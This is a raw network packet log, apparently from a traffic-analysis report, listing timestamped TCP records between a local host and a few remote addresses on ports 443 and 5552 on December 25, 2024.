                                                                                                                                                                Dec 25, 2024 09:08:44.252145052 CET44350055142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:44.252253056 CET50055443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:44.252563000 CET50067443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:44.252571106 CET44350067142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:44.252690077 CET50067443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:44.252898932 CET50068443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:44.252918005 CET44350068142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:44.252948999 CET50067443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:44.252958059 CET44350067142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:44.253062963 CET50068443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:44.253213882 CET50068443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:44.253221989 CET44350068142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:45.642056942 CET50065443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:45.642091036 CET50066443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:45.642102957 CET50067443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:45.642128944 CET50068443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:45.642577887 CET50075443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:45.642602921 CET44350075142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:45.642831087 CET50075443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:45.643090963 CET50075443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:45.643105030 CET44350075142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:45.644006968 CET50076443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:45.644027948 CET44350076142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:45.644181013 CET50076443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:45.644814968 CET50076443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:45.644826889 CET44350076142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:47.331031084 CET44350075142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:47.331099987 CET50075443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:47.331484079 CET44350076142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:47.331552029 CET50076443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:47.331690073 CET44350075142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:47.331743002 CET50075443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:47.332118988 CET44350076142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:47.332171917 CET50076443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:47.336335897 CET50075443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:47.336345911 CET44350075142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:47.336546898 CET44350075142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:47.336657047 CET50075443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:47.336683035 CET50076443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:47.336688995 CET44350076142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:47.336885929 CET44350076142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:47.336932898 CET50076443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:47.337239981 CET50075443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:47.337305069 CET50076443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:47.379326105 CET44350076142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:47.379338026 CET44350075142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:48.231679916 CET44350075142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:48.231739044 CET50075443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:48.231755018 CET44350075142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:48.231838942 CET50075443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:48.232721090 CET44350075142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:48.232758045 CET44350075142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:48.232779026 CET50075443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:48.232804060 CET50075443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:48.240411043 CET44350076142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:48.240488052 CET50076443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:48.240972996 CET44350076142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:48.241009951 CET44350076142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:48.241055965 CET50076443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:48.244389057 CET50075443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:48.244400978 CET44350075142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:48.245016098 CET50084443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:48.245035887 CET44350084142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:48.245106936 CET50084443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:48.245331049 CET50085443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:48.245395899 CET44350085142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:48.245452881 CET50085443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:48.246028900 CET50085443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:48.246058941 CET44350085142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:48.257267952 CET50076443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:48.257275105 CET44350076142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:48.257294893 CET50076443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:48.257317066 CET50076443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:48.258148909 CET50086443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:48.258148909 CET50084443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:48.258157969 CET44350086142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:48.258172035 CET44350084142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:48.258199930 CET50087443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:48.258234024 CET50086443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:48.258239031 CET44350087142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:48.258372068 CET50087443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:48.258506060 CET50086443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:48.258513927 CET44350086142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:48.258846045 CET50087443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:48.258873940 CET44350087142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:49.938025951 CET44350085142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:49.938116074 CET50085443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:49.938899040 CET50085443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:49.938913107 CET44350085142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:49.942608118 CET50085443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:49.942625999 CET44350085142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:49.945784092 CET44350084142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:49.946002960 CET50084443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:49.947639942 CET44350086142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:49.947892904 CET50086443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:49.950607061 CET50084443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:49.950613976 CET44350084142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:49.950817108 CET44350084142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:49.951014042 CET50084443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:49.951553106 CET50084443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:49.952852964 CET44350087142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:49.953003883 CET50087443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:49.953330040 CET50086443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:49.953337908 CET44350086142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:49.953371048 CET50087443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:49.953387022 CET44350087142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:49.953536987 CET44350086142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:49.953591108 CET50087443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:49.953600883 CET44350087142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:49.953617096 CET50086443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:49.954212904 CET50086443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:49.995377064 CET44350086142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:49.999341965 CET44350084142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:50.838507891 CET44350085142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:50.838572025 CET50085443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:50.838599920 CET44350085142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:50.838640928 CET50085443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:50.839366913 CET44350085142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:50.839420080 CET44350085142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:50.839459896 CET50085443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:50.839479923 CET50085443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:50.852655888 CET50085443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:50.852693081 CET44350085142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:50.853429079 CET50096443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:50.853461027 CET44350096142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:50.853579998 CET50096443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:50.854521036 CET50096443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:50.854537010 CET44350096142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:50.858731985 CET44350087142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:50.858788967 CET50087443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:50.858808994 CET44350087142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:50.858880997 CET50087443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:50.858941078 CET50087443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:50.858977079 CET44350087142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:50.859067917 CET50087443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:50.859491110 CET50097443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:50.859524965 CET44350097142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:50.859761953 CET50097443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:50.859971046 CET50097443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:50.859976053 CET44350097142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:50.882919073 CET44350084142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:50.882955074 CET44350084142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:50.882973909 CET50084443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:50.882986069 CET44350084142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:50.882997036 CET50084443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:50.883035898 CET50084443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:50.883042097 CET44350084142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:50.883054972 CET44350084142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:50.883076906 CET50084443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:50.883100986 CET50084443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:50.883692026 CET50084443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:50.883702040 CET44350084142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:50.884131908 CET50098443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:50.884162903 CET44350098142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:50.884207964 CET50098443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:50.884423971 CET50098443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:50.884433985 CET44350098142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:51.119388103 CET44350086142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:51.119419098 CET44350086142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:51.119465113 CET50086443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:51.119476080 CET44350086142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:51.119507074 CET50086443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:51.119585037 CET50086443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:51.119589090 CET44350086142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:51.119596958 CET44350086142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:51.119643927 CET50086443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:51.120187998 CET50086443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:51.120197058 CET44350086142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:51.120917082 CET50103443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:51.120956898 CET44350103142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:51.121139050 CET50103443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:51.121514082 CET50103443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:51.121556044 CET44350103142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:51.345187902 CET50096443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:51.345222950 CET50097443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:51.345271111 CET50098443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:51.345278978 CET50103443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:51.345820904 CET50104443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:51.345839977 CET44350104142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:51.345875025 CET50105443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:51.345969915 CET50104443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:51.345987082 CET44350105142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:51.347256899 CET50104443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:51.347268105 CET44350104142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:51.347403049 CET50105443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:51.348611116 CET50105443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:51.348648071 CET44350105142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:53.041035891 CET44350105142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:53.041116953 CET50105443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:53.041764975 CET44350105142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:53.041827917 CET50105443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:53.042197943 CET44350104142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:53.042273998 CET50104443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:53.042918921 CET44350104142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:53.042994022 CET50104443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:53.046235085 CET50104443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:53.046241999 CET44350104142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:53.046437979 CET44350104142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:53.046488047 CET50105443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:53.046504021 CET44350105142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:53.046510935 CET50104443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:53.046709061 CET44350105142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:53.046875000 CET50105443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:53.046938896 CET50104443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:53.047339916 CET50105443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:53.087354898 CET44350104142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:53.095350027 CET44350105142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:53.937325954 CET44350104142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:53.937434912 CET50104443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:53.937443972 CET44350104142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:53.937809944 CET50104443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:53.938025951 CET44350104142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:53.938082933 CET44350104142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:53.938123941 CET50104443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:53.939986944 CET44350105142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:53.940176964 CET50105443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:53.940207005 CET44350105142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:53.940248013 CET50105443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:53.943260908 CET44350105142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:53.943294048 CET44350105142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:53.945111990 CET50105443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:53.954005957 CET50104443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:53.954014063 CET44350104142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:53.954642057 CET50115443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:53.954713106 CET44350115142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:53.955037117 CET50116443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:53.955065966 CET44350116142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:53.955074072 CET50115443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:53.955105066 CET50116443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:53.955221891 CET50105443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:53.955231905 CET44350105142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:53.955682993 CET50117443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:53.955720901 CET44350117142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:53.955923080 CET50118443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:53.955933094 CET44350118142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:53.955967903 CET50117443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:53.955988884 CET50118443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:53.956561089 CET50117443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:53.956578016 CET44350117142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:53.956661940 CET50118443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:53.956677914 CET44350118142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:53.956962109 CET50115443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:53.956999063 CET44350115142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:53.957113981 CET50116443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:53.957122087 CET44350116142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:54.743494987 CET555249753172.111.138.100192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:54.798190117 CET497535552192.168.2.4172.111.138.100
                                                                                                                                                                Dec 25, 2024 09:08:55.650333881 CET44350115142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:55.650413990 CET50115443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:55.650521994 CET44350117142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:55.651609898 CET44350116142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:55.651655912 CET50117443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:55.651676893 CET44350118142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:55.651715994 CET50116443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:55.651859999 CET50118443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:55.653714895 CET50115443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:55.653743029 CET44350115142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:55.653964043 CET44350115142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:55.655379057 CET50117443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:55.655390024 CET44350117142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:55.655421972 CET50116443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:55.655430079 CET44350116142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:55.655459881 CET50115443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:55.655592918 CET44350117142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:55.657315016 CET50116443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:55.657320023 CET44350116142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:55.657320976 CET50115443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:55.657397985 CET50117443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:55.657740116 CET50117443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:55.668586969 CET50118443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:55.668586969 CET50118443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:55.668607950 CET44350118142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:55.668622971 CET44350118142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:55.699332952 CET44350117142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:55.699431896 CET44350115142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:56.558581114 CET44350118142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:56.558661938 CET50118443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:56.558729887 CET44350118142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:56.558787107 CET50118443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:56.558842897 CET50118443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:56.558933973 CET44350118142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:56.559040070 CET50118443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:56.559469938 CET50125443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:56.559492111 CET44350125142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:56.559690952 CET50125443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:56.561136961 CET50125443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:56.561151028 CET44350125142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:56.572002888 CET44350116142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:56.572081089 CET50116443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:56.572092056 CET44350116142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:56.572128057 CET50116443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:56.572336912 CET50116443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:56.572455883 CET44350116142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:56.572518110 CET50116443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:56.572995901 CET50126443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:56.573031902 CET44350126142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:56.573544979 CET50126443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:56.573860884 CET50126443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:56.573874950 CET44350126142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:56.580745935 CET44350115142.250.181.97192.168.2.4
